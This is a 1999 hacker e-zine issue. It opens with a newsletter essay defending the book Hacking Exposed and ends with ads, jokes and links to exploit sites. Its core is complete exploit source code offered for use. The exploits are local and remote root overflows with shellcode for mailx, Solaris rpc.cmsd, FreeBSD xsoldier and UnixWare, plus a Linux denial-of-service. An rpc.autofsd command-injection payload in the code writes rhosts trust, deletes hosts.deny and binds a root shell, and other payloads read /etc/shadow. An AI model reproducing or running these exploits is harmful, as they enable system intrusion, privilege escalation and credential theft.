S-Th, Dec. 11-16, San Francisco, Calif.
http://www.sans.org/sf99/sf99.htm
Extranet Security
M-W, Dec. 13-15 San Francisco, Calif.
http://www.unex.berkeley.edu/eng
=====================================================
4. SECURITY PERSPECTIVES
*EXPOSING HACKING WITH HACKING EXPOSED
By Ben Rothke
Do books about hacking create more hackers? Is corporate
America at risk due to such titles?
Many people in the computer industry feel that such
dissemination of information is a sure way to increase
computer malevolence. The question has been re-ignited
with the publication of Hacking Exposed: Network Security
Secrets and Solutions, by Stuart McClure, Joel Scambray
and George Kurtz, all formerly with Ernst & Young's
e-security group. Are such titles simply cookbooks for
those attempting to perform computer crimes? The
knee-jerk answer might be yes, but in reality, the answer
is a clear no.
As an example, will the reader of Adventures in the
Kitchen by Wolfgang Puck emerge as a gourmet chef, or
will the reader of Dr. Atkins's New Diet Revolution lose
weight by reading the book? While the written word is
powerful, and Hacking Exposed is indeed a powerful book,
there is no way for a book to instantaneously turn a
novice into a dangerous hacker.
While a preponderance of corporate systems are indeed
insecure, it is irresponsible and capricious to think
that the mere appearance of a book such as Hacking
Exposed will create a landslide of hacker activity. Such
an allegation is simply an attempt to transfer corporate
America's apathy towards information security, and apply
a quick blame to a much larger problem.
Anyone who views hacking as an exercise in reading a
book does not understand hacking, nor the nature of
securing computer systems. True, the book lists tools and
exercises that will make a hacking exercise easier. But
to perform a real hack is something that takes more than
the book has to offer. The authors state something to the
effect of, "hacking root is a state of mind." With such a
mantra, the true hacker will know that running a few
handy tools or scripts will only provide them with a
start to their hacking endeavor. When the tools fail,
where will they go on? If not their own fortitude, their
own quest for root, a quest that can not be found in any
book, then the hacking attempt will quickly end there.
Want to know a secret? Contrary to the movies and CNN
reports, hacking is a pretty boring exercise. Just as a
novice hunter will tire after a short while, so too will
a script kiddie wear down easily. For the novice hacker,
the appearance of a book about hacking will neither help
nor hinder his aspirations. Traversing through networks,
servers and myriad hosts is tedious at best for the
greenhorn. It is only the media and uninitiated who
attempt to glamorize such activities.
Hacking Exposed is an important title for those who are
interested in securing their systems, and know what the
innumerable vulnerabilities within their systems are.
Will such a title unleash a new wave of hackers? No.
Ben Rothke (brothke@ebnetworks.com) is a network
security consultant with eB Networks Inc.
=====================================================
ADVERTISEMENT
ICSA.net announces a free Webcast, "An Overview of
Intrusion Detection Technologies," to air on Dec. 9,
1999. This one-hour seminar will explain intrusion
detection and vulnerability assessment in clear terms, as
well as announce the new ICSA Intrusion Detection Buyers'
Guide, an online resource for decision-makers. For
details, visit http://www.icsa.net.
=====================================================
Security Wire Digest and Information Security magazine
are published by ICSA.net, the world's leader in Internet
Security services.
Copyright (c) 1999. All rights reserved. No portion of
this newsletter may be redistributed or republished in
any format without the express consent of the publisher.
=====================================================
To SUBSCRIBE to Security Wire Digest, go to:
http://www.infosecuritymag.com/newsletter
To UNSUBSCRIBE to Security Wire Digest, go to:
http://custserv.emailch.com/removeme/unsub.cfm?j=11887&e=jericho@dimensional.com
To CHANGE your e-mail address, go to:
http://polaris.emailch.com/infosecurity/questionnaire.cfm?e=jericho@dimensional.com
.. email integration by EmailChannel, Inc.
For more information, send email to info@emailch.com
or please visit http://www.emailch.com
ISN is sponsored by Security-Focus.COM
@HWA
38.0 mailx.c slackware 3.6 local exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
I dunno if this is an old overflow or (it probably is...) but I was just
messing with the Slackware 3.6 source and found it.
Here's some basic notes on what happens:
$HOME environment dir contains exploit.
Exploit buffer size = 1024 + 8
tinit() is called first. This gets the homedir variable from cp which is a
value returned by getenv("HOME");
load() is called next, taking as an argument an expended "~/.mailrc".
expand():
if (name[0] == '~' && (name[1] == '/' || name[1] == '\0')) {
sprintf(xname, "%s%s", homedir, name + 1);
xname size = 1024
homedir == getenv("HOME")
name == "~/.mailrc"
"~/.mailrc" is at end of the buffer, so this should just be pushed over
the stack and forgotten about.
*/
/*
* mailx buffer overflow
*
*/
#include <stdio.h>
#include <stdlib.h>
#define BSIZE (1024)
#define OSIZE (8)
#define ESIZE (BSIZE + OSIZE)
#define NOP (0x90)
#define OFFSET (0)
char hellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
long get_esp (void)
{
__asm__ ("movl %esp, %eax");
}
int main (int argc, char * * argv)
{
char * evil;
int i, j;
long addr;
int offset = OFFSET;
evil = (char *)malloc(ESIZE);
for (i = 0; i < (ESIZE - strlen(hellcode) - 4); ++i)
evil[i] = NOP;
for (j = 0; i < (ESIZE - 4); ++i, ++j)
evil[i] = hellcode[j];
if (argc > 1) offset = atoi(argv[1]);
addr = (get_esp() - offset);
*(long *)(evil + i) = addr;
setenv("HOME", evil, 1);
fprintf(stderr, "\nmailx-8.1.1 exploit\n");
fprintf(stderr, "Using address 0x%x, offset %d\n\n", addr, offset);
execl("/usr/bin/mail", "mail", NULL);
}
/* www.hack.co.za */
@HWA
39.0 cmsdex.c Solaris (2.6 / 7.0) remote exploit.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
* cmsdex - i386 Solaris remote root exploit for /usr/dt/bin/rpc.cmsd
*
* Tested and confirmed under Solaris 2.6 and 7.0 (i386)
*
* Usage: % cmsdex -h hostname -c command -s sp -o offset
*
* where hostname is the hostname of the machine running the vulnerable
* CDE calendar service, command is the command to run as root on the
* vulnerable machine, sp is the %esp stack pointer value, and offset
* is the number of bytes to add to sp to calculate your target %eip
* (try -1000 to 1000 in increments of 10 or so for starters once you
* have a good guess at the stack pointer).
*
* When specifying a command, be sure to pass it to the exploit as a
* single argument, namely enclose the command string in quotes if it
* contains spaces or other special shell delimiter characters. The
* command string must not be longer than 100 bytes. The exploit will
* pass this string without modification to /bin/sh -c on the remote
* machine, so any normally allowed Bourne shell syntax is also allowed
* in the command string. Due to the nature of the exploit, the command
* string must not contain any @ characters.
*
* Demonstration values for i386 Solaris:
*
* (2.6) cmsdex -h host.example.com -c "touch /0wn3d" -s 0x0804748c -o 0
* (7.0) cmsdex -h host.example.com -c "touch /0wn3d" -s 0x08047378 -o 0
*
* June 4, 1999
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <rpc/rpc.h>
#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PROC 21
#define EGGLEN 1036
#define JUGULAR 1024
#define NOP 0x90
char shell[] =
/* 0 */ "\xeb\x3d" /* jmp springboard */
/* syscall: */
/* 2 */ "\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0 */
/* 9 */ "\xc3" /* ret */
/* start: */
/* 10 */ "\x5e" /* popl %esi */
/* 11 */ "\x31\xc0" /* xor %eax,%eax */
/* 13 */ "\x89\x46\xbf" /* movl %eax,-0x41(%esi) */
/* 16 */ "\x88\x46\xc4" /* movb %al,-0x3c(%esi) */
/* 19 */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */
/* 22 */ "\x88\x46\x17" /* movb %al,0x17(%esi) */
/* 25 */ "\x88\x46\x1a" /* movb %al,0x1a(%esi) */
/* 28 */ "\x88\x46\xff" /* movb %al,0x??(%esi) */
/* execve: */
/* 31 */ "\x31\xc0" /* xor %eax,%eax */
/* 33 */ "\x50" /* pushl %eax */
/* 34 */ "\x56" /* pushl %esi */
/* 35 */ "\x8d\x5e\x10" /* leal 0x10(%esi),%ebx */
/* 38 */ "\x89\x1e" /* movl %ebx,(%esi) */
/* 40 */ "\x53" /* pushl %ebx */
/* 41 */ "\x8d\x5e\x18" /* leal 0x18(%esi),%ebx */
/* 44 */ "\x89\x5e\x04" /* movl %ebx,0x4(%esi) */
/* 47 */ "\x8d\x5e\x1b" /* leal 0x1b(%esi),%ebx */
/* 50 */ "\x89\x5e\x08" /* movl %ebx,0x8(%esi) */
/* 53 */ "\xb0\x3b" /* movb $0x3b,%al */
/* 55 */ "\xe8\xc6\xff\xff\xff" /* call syscall */
/* 60 */ "\x83\xc4\x0c" /* addl $0xc,%esp */
/* springboard: */
/* 63 */ "\xe8\xc6\xff\xff\xff" /* call start */
/* data: */
/* 68 */ "\xff\xff\xff\xff" /* DATA */
/* 72 */ "\xff\xff\xff\xff" /* DATA */
/* 76 */ "\xff\xff\xff\xff" /* DATA */
/* 80 */ "\xff\xff\xff\xff" /* DATA */
/* 84 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA */
/* 92 */ "\x2d\x63\xff"; /* DATA */
extern char *optarg;
struct cm_send {
char *s1;
char *s2;
};
struct cm_reply {
int i;
};
bool_t
xdr_cm_send(XDR *xdrs, struct cm_send *objp)
{
if (!xdr_wrapstring(xdrs, &objp->s1))
return (FALSE);
if (!xdr_wrapstring(xdrs, &objp->s2))
return (FALSE);
return (TRUE);
}
bool_t
xdr_cm_reply(XDR *xdrs, struct cm_reply *objp)
{
if (!xdr_int(xdrs, &objp->i))
return (FALSE);
return (TRUE);
}
int
main(int argc, char *argv[])
{
int c, slen, clen;
char *program, *hostname, *command, egg[EGGLEN+1], *eggp;
unsigned long int sp = 0, addr, alen = 16;
long int offset = 0;
CLIENT *cl;
struct cm_send send;
struct cm_reply reply;
struct timeval tm = { 10, 0 };
enum clnt_stat stat;
program = argv[0];
hostname = "localhost";
command = "chmod 666 /etc/shadow";
while ((c = getopt(argc, argv, "h:c:s:o:a:")) != EOF) {
switch (c) {
case 'h':
hostname = optarg;
break;
case 'c':
command = optarg;
break;
case 's':
sp = strtoul(optarg, NULL, 0);
break;
case 'o':
offset = strtol(optarg, NULL, 0);
break;
case 'a':
alen = strtoul(optarg, NULL, 0);
break;
case '?':
default:
printf("usage: %s -h hostname -c command -s sp -o offset\n",
program);
exit(1);
break;
}
}
slen = strlen(shell);
clen = strlen(command);
if (clen > 100) {
printf("exploit failed; command string too long "
"(must not exceed 100 characters)\n");
exit(1);
}
shell[30] = (char) (clen + 27);
memset(egg, NOP, EGGLEN);
eggp = egg + EGGLEN - alen - 1 - clen - slen;
memcpy(eggp, shell, slen); eggp += slen;
memcpy(eggp, command, clen); eggp += clen;
*eggp++ = '\xff'; addr = sp + offset;
while (eggp <= egg + EGGLEN - 4) {
*eggp++ = (addr >> 0) & 0xff;
*eggp++ = (addr >> 8) & 0xff;
*eggp++ = (addr >> 16) & 0xff;
*eggp++ = (addr >> 24) & 0xff;
}
egg[JUGULAR] = '\xff'; egg[EGGLEN] = '\0';
send.s1 = egg; send.s2 = "";
cl = clnt_create(hostname, CMSD_PROG, CMSD_VERS, "udp");
if (cl == NULL) {
clnt_pcreateerror("clnt_create");
printf("exploit failed; unable to contact RPC server\n");
exit(1);
}
cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
stat = clnt_call(cl, CMSD_PROC, xdr_cm_send, (caddr_t) &send,
xdr_cm_reply, (caddr_t) &reply, tm);
if (stat == RPC_SUCCESS) {
printf("exploit failed; RPC succeeded and returned %d\n", reply.i);
clnt_destroy(cl);
exit(1);
} else {
clnt_perror(cl, "clnt_call");
printf("exploit probably worked; RPC failure was expected\n");
clnt_destroy(cl);
exit(0);
}
}
/* www.hack.co.za */
@HWA
40.0 xsoldierx.c FreeBSD 3.3 local exploit by Brock Tellier.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
* xsoldier exploit for Freebsd-3.3-RELEASE
* Drops a suid root shell in /bin/sh
* Brock Tellier btellier@usa.net
*/
#include <stdio.h>
char shell[]= /* mudge@l0pht.com */
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui";
#define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n"
void buildui() {
FILE *fp;
char cc[100];
fp = fopen("/tmp/ui.c", "w");
fprintf(fp, CODE);
fclose(fp);
snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
system(cc);
}
main (int argc, char *argv[] ) {
int x = 0;
int y = 0;
int offset = 0;
int bsize = 4400;
char buf[bsize];
int eip = 0xbfbfdb65; /* works for me */
buildui();
if (argv[1]) {
offset = atoi(argv[1]);
eip = eip + offset;
}
fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE <btellier@usa.net>\n");
fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n");
fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);
for ( x = 0; x < 4325; x++) buf[x] = 0x90;
fprintf(stderr, "NOPs to %d\n", x);
for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
fprintf(stderr, "Shellcode to %d\n",x);
buf[x++] = eip & 0x000000ff;
buf[x++] = (eip & 0x0000ff00) >> 8;
buf[x++] = (eip & 0x00ff0000) >> 16;
buf[x++] = (eip & 0xff000000) >> 24;
fprintf(stderr, "eip to %d\n",x);
buf[bsize]='\0';
execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL);
}
/* www.hack.co.za */
@HWA
41.0 rpc.autofsd.c FreeBSD/misc remote exploit by guidob.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
// *** Synnergy Networks
// * Description:
//
// Remote exploit for rpc.autofsd on BSD. This will attempt to put a root shell
// on tcp port 530.
// * Author:
//
// guidob (guidob@synnergy.net)
// Synnergy Networks (c) 1999, http://www.synnergy.net
// * Greets:
//
// Synnergy Networks, LoU, Cindy
// * Comments:
//
// This will not work on all types and/or versions.
// *** Synnergy Networks
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpc/xdr.h>
#include <signal.h>
#define AUTOFS_PROG ((u_long)100099)
#define AUTOFS_VERS ((u_long)1)
#define AUTOFS_MOUNT ((u_long)1)
#define AT 8
#define A_MAXNAME 255
#define A_MAXOPTS 255
#define A_MAXPATH 1024
struct mntrequest {
char *name; /* name to be looked up */
char *map; /* map to use */
char *opts; /* default options */
char *path; /* mountpoint to use */
};
struct mntres {
int status; /* 0=OK, otherwise an errno from <sys/errno.h> */
};
bool_t xdr_mntrequest(XDR *xdrs,struct mntrequest *objp){
if (!xdr_string(xdrs, &objp->name, A_MAXNAME)) return (FALSE);
if (!xdr_string(xdrs, &objp->map, A_MAXNAME)) return (FALSE);
if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS)) return (FALSE);
if (!xdr_string(xdrs, &objp->path, A_MAXPATH)) return (FALSE);
return (TRUE);
}
void signal_handler(void) {
exit(0);
}
bool_t xdr_mntres(XDR *xdrs,struct mntres *objp){
if (!xdr_int(xdrs, &objp->status)) return (FALSE);
return (TRUE);
}
main(int argc, char **argv){
CLIENT *cl;
struct mntrequest mntreq;
struct mntres *res;
struct sockaddr_in target;
struct hostent *hp;
struct timeval tm;
char *host;
enum clnt_stat stat;
int sd;
signal(SIGALRM, signal_handler);
alarm(AT);
host=argv[1];
if ((target.sin_addr.s_addr = inet_addr(host)) == -1) {
if ((hp = gethostbyname(host)) == NULL) {
printf("%s: cannot resolve\n", host);
exit(1);
} else
target.sin_addr.s_addr = *(u_long *)hp->h_addr;
}
target.sin_family=AF_INET;
target.sin_port=0;
sd=RPC_ANYSOCK;
tm.tv_sec=8;
tm.tv_usec=0;
if((cl=clntudp_create(&target,AUTOFS_PROG,AUTOFS_VERS,tm,&sd))==NULL) {
clnt_pcreateerror("clnt_create");
exit(0);
}
cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
tm.tv_sec = 25;
/* echo "courier stream tcp nowait root /bin/sh sh -i" > /tmp/bob;inetd /tmp/bob
*/
mntreq.name=";echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; echo \"courier stream tcp nowait root /bin/sh sh -i\" > /tmp/bob;inetd /tmp/bob"; /* Tu mozna wstawic co sie chce */
mntreq.map="/bin/true";
mntreq.path="/hosts";
mntreq.opts="";
bzero((char *)&res, sizeof(res));
if ((stat = clnt_call(cl, AUTOFS_MOUNT, (xdrproc_t)xdr_mntrequest,&mntreq,
(xdrproc_t)xdr_mntres, &res, tm)) != RPC_SUCCESS) {
clnt_perror(cl, "clnt_call");
exit(1);
}
clnt_destroy(cl);
}
// EOF
@HWA
42.0 iplenght.c Redhat 5.1 + Debian 2.1 DoS exploit by Andrea Arcangeli.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* Exploit option length missing checks in:
Debian Linux 2.1
RedHat Linux 5.2
Linux kernel 2.0.38
Linux kernel 2.0.37
Linux kernel 2.0.36
Linux kernel 2.0.35
Linux kernel 2.0
Andrea Arcangeli <andrea@suse.de>
*/
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <netinet/ip.h>
main()
{
int sk;
struct sockaddr_in sin;
struct hostent * hostent;
#define PAYLOAD_SIZE (0xffff-sizeof(struct udphdr)-sizeof(struct iphdr))
#define OPT_SIZE 1
char payload[PAYLOAD_SIZE];
sk = socket(AF_INET, SOCK_DGRAM, 0);
if (sk < 0)
perror("socket"), exit(1);
if (setsockopt(sk, SOL_IP, IP_OPTIONS, payload, OPT_SIZE) < 0)
perror("setsockopt"), exit(1);
bzero((char *)&sin, sizeof(sin));
sin.sin_port = htons(0);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = htonl(2130706433);
if (connect(sk, (struct sockaddr *) &sin, sizeof(sin)) < 0)
perror("connect"), exit(1);
if (write(sk, payload, PAYLOAD_SIZE) < 0)
perror("write"), exit(1);
}
/* www.hack.co.za */
@HWA
43.0 truck.c UnixWare 7.1 local explot by Brock Tellier.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/**
** "Its a hole you could drive a truck through."
** -Aleph One
**
** truck.c UnixWare 7.1 security model exploit
** Demonstrates how we own privileged processes
**
** Usage: cc -o truck truck.c
** ./truck <filetype> where filetype is 1, 2 or 3
** (for dacread, dacwrite and setuid, respectively)
**
** This will put $XNEC in the environment and run a shell.
** From there you must use gdb/debug to load a file of the
** type you chose (by checking /etc/security/tcb/privs)
** and setting a breakpoint at _init via "break _init".
** When you "run" and break at _init, change your EIP
** to something between 0x8046000 and 0x8048000 with
** "set $eip = 0x8046b75" and "continue" twice.
**
**
** Brock Tellier btellier@usa.net
**/
#include <stdlib.h>
#include <stdio.h>
char scoshell[]= /* This isn't a buffer overflow! really! */
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/sm\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
#define LEN 3500
#define NOP 0x90
#define DACWRITE "void main() { system(\"echo + + > /.rhosts; chmod 700 \
/.rhosts; chown root:sys /.rhosts; rsh -l root localhost sh -i \
\"); }\n"
#define DACREAD "void main() { system(\"cat /etc/shadow\");}\n"
#define SETUID "void main() { setreuid(0,0);system(\"/bin/sh\"); }\n"
void usage(int ftype) {
fprintf(stderr, "Error: Usage: truck [filetype]\n");
fprintf(stderr, "Where filetype is one of the following: \n");
fprintf(stderr, "1 dacread\n2 dacwrite\n3 setuid\n");
fprintf(stderr, "Note: if file has allprivs, use setuid\n");
}
void buildsm(int ftype) {
FILE *fp;
char cc[100];
fp = fopen("/tmp/sm.c", "w");
if (ftype == 1) fprintf(fp, DACREAD);
else if(ftype == 2) fprintf(fp, DACWRITE);
else if(ftype == 3) fprintf(fp, SETUID);
fclose(fp);
snprintf(cc, sizeof(cc), "cc -o /tmp/sm /tmp/sm.c");
system(cc);
}
int main(int argc, char *argv[]) {
int i;
int buflen = LEN;
char buf[LEN];
int filetype = 0;
char filebuf[20];
if(argc > 2 || argc == 1) {
usage(filetype);
exit(0);
}
if ( argc > 1 ) filetype=atoi(argv[1]);
if ( filetype > 3 || filetype < 1 ) { usage(filetype); exit(-1); }
buildsm(filetype);
fprintf(stderr, "\nUnixWare 7.1 security model exploit\n");
fprintf(stderr, "Brock Tellier btellier@usa.net\n\n");
memset(buf,NOP,buflen);
memcpy(buf+(buflen - strlen(scoshell) - 1),scoshell,strlen(scoshell));
memcpy(buf, "XNEC=", 5);
putenv(buf);
buf[buflen - 1] = 0;
system("/bin/sh");
exit(0);
}
/* www.hack.co.za */
@HWA
-=----------=- -=----------=- -=----------=- -=----------=-
0
0
0
o
O O O
0
=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _ _ _
/\ | | | | (_) (_)
/ \ __| |_ _____ _ __| |_ _ ___ _ _ __ __ _
/ /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` |
/ ____ \ (_| |\ V / __/ | | |_| \__ \ | | | | (_| |
/_/ \_\__,_| \_/ \___|_| \__|_|___/_|_| |_|\__, |
__/ |
|___/
ADVERTISING IS FREE, SEND IN YOUR ADS TO CRUCIPHUX@DOK.ORG FOR INCLUSION HERE
http://revenger.hypermart.net
��� ����� � � ������� �� � ������ ����� ���
� � � � � � � � � � � � � � �
� � � � � � � � � � � �� � � �
�� ��� � � ������� � � � � ��� ��
� � � � � � � � � � ��� � � �
� � � � � � � � � � � � � �
� � ����� � ������� � �� ��� ����� � � 's
T E X T Z F I L E HOMEPAGE
http://revenger.hypermart.net
Here you may find up to 340 text files for:
ANARCHY , HACKING , GUIDES , CRACKING , VIRUS , GENERAL , ELECTRONICS ,
UNIX , MAGAZINES , TOP SECRET , CARDING , U.F.O.s , LOCKPICKING , IRC ,
PHREAKING , BOOKS AND A-S FILES AVAILABLE!
http://revenger.hypermart.net
Visit Us Now !
.
.
............... .
: : . . . . . .
__:________ : : ___________ . . .
\ < /_____:___ : ( < __( :_______
) : )______:___\_ (___( : /
=====/________|_________/ < | : (________________(======
: (__________________) :wd!
. : : :
- / - w w w . h a c k u n l i m i t e d . c o m - / -
: . . . . . : :
. . . . . :...............:
.
.
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
When people ask you "Who is Kevin Mitnick?" do you have an answer?
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE EVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
http://www.2600.com/ http://www.kevinmitnick.com
+-----------------------------------------------------------------------------+
| SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE |
| =================== http://smog.cjb.net/ NEWS on SECURITY |
| NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET |
| http://smog.cjb.net/ NEWS on TECHNOLOGY |
+-----------------------------------------------------------------------------+
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
* http://www.csoft.net" One of our sponsers, visit them now www.csoft.net *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
// or cruciphux@dok.org //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Send in submissions for this section please! ............c'mon, you KNOW you
wanna...yeah you do...make it fresh and new...be famous...<sic>
Submitted by Deflux, check out his site at http://www.advdata.net/~deflux/
Define your terms for software releases:
Advanced User: A person who has managed to remove a computer from its
packing materials.
Power User: A person who has mastered the brightness and contrast controls
on any computer monitor.
American Made: Assembled in America from parts made abroad.
Alpha Test Version: Too buggy to be released to the paying public.
Beta Test Version: Still too buggy to be released.
Release Version: Alternate pronunciation of "Beta Test Version".
Sales Manager: Last week's new sales associate.
Consultant: A former sales associate who has mastered at least one tenth
of the dBase III Plus Manual.
Systems Integrator: A former consultant who understands the term AUTOEXEC.BAT.
AUTOEXEC.BAT: A sturdy aluminum or wooden shaft used to coax AT hard disks into
performing properly.
Backup: The duplicate copy of crucial data that no one bothered to make;
used only in the abstract.
Clone: One of the many advanced-technology computers IBM is beginning to
wish it had built.
Convertible: Transformable from a second-rate computer to a first-rate
doorstop or paperweight. (Replaces the term "junior".)
Copy Protection: A clever method of preventing incompetent pirates from
stealing software and legitimate customers from using it.
Database Manager: A program that allows users to manipulate data in every
conceivable way except the absolutely essential way they
conceive of the day after entering 20 megabytes of raw data.
EMS: Emergency Medical Service; often summoned in cases of apoplexy induced
by attempts to understand extended, expanded, or enhanced memory specs.
Encryption: A powerful algorithmic encoding technique employed in the creation
of computer manuals.
FCC-Certified: Guaranteed not to interfere with radio or television reception
until you add the cable that is required to make it work.
Hard Disk: A device that allows users to delete vast quantities of data with
simple mnemonic commands.
Integrated Software: A single product that deftly performs hundreds of
functions that the user never needs and awkwardly
performs the half-dozen he uses constantly.
Laptop: Smaller and lighter than the average breadbox.
Multitasking: A clever method of simultaneously slowing down the multitude
of computer programs that insist on running too fast.
Network: An electronic means of allowing more than one person at a time to
corrupt, trash, and otherwise cause permanent damage to useful
information.
Portable: Smaller and lighter than the average refrigerator.
Support: The mailing of advertising literature to customers who have returned
a registration card.
Transportability: Neither chained to a wall or attached to an alarm system.
Printer: An electromechnical paper shredding device.
Spreadsheet: A program that gives the user quick and easy access to a wide
variety of highly detailed reports based on highly inaccurate
assumptions.
Thought Processor: An electronic version of the intended outline procedure
that thinking people instantly abandon upon graduation
from high school.
Upgraded: Didn't work the first time.
User Friendly: Supplied with a full color manual.
Very User Friendly: Supplied with a disk and audiotape so the user need
not bother with the full color manual.
Version 1.0: Buggier than Maine in June; eats data.
Version 1.1: Eats data only occasionally; upgrade is free, to avoid litigation
by disgruntled users of Version 1.0.
Version 2.0: The version originally planned as the first release, except for
a couple of data-eating bugs that just won't seem to go away;
no free upgrades or the company would go bankrupt.
Version 3.0: The revision in the works when the company goes bankrupt.
Videotex: A moribund electronic service offering people the privelege of
paying to read the weather on their television screens instead
of having Willard Scott read it to them free while they
brush their teeth.
Warranty: Disclaimer.
Workstation: A computer or terminal slavishly linked to a mainframe that does
not offer game programs.
(The previous list of terms was furnished by copied from the
Government Computer News, November 21, 1988 issue. The
original data was provided by the WIC Connection.)
SITE.1
http://www.temporal.org/thescene/pics/
Wonder who's behind the nick on IRC? or in the scene? check this link out
to see some of the more well known people from around irc etc...
http://www.hack.co.za/
By: Gov-Boi
Recently updated, looks clean, some graphics, not a bad layout, no more text
only. always a good site for recent exploits, give it a visit.
http://hhp.perlx.com/
By: Loophole
Very nice and well done site by an oldschool ninja... can be found on irc
but don't harass him or he'll get medeival on your ass!...you can find
exploits, advisories and the like here, its a work in progress, brand
new site. Looks promising! - Ed
http://www.scriptkiddies.org/
Well it had to happen, they even have merchandizing, check it out, more
news, tech and otherwise, scene gossip, tips and articles. can u dig it?
Note: new site, some stuff isn't setup yet but should be soon...at least
it looks sweet. - Ed
You can Send in submissions for this section too if you've found
(or RUN) a cool site...
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
___| _ \ |
| __| _` |\ \ / | | __| _ \ _` |
| | ( | ` < | | | __/ ( |
\____|_| \__,_| _/\_\\___/ _| \___|\__,_|
Note: The hacked site reports stay, especially wsith some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
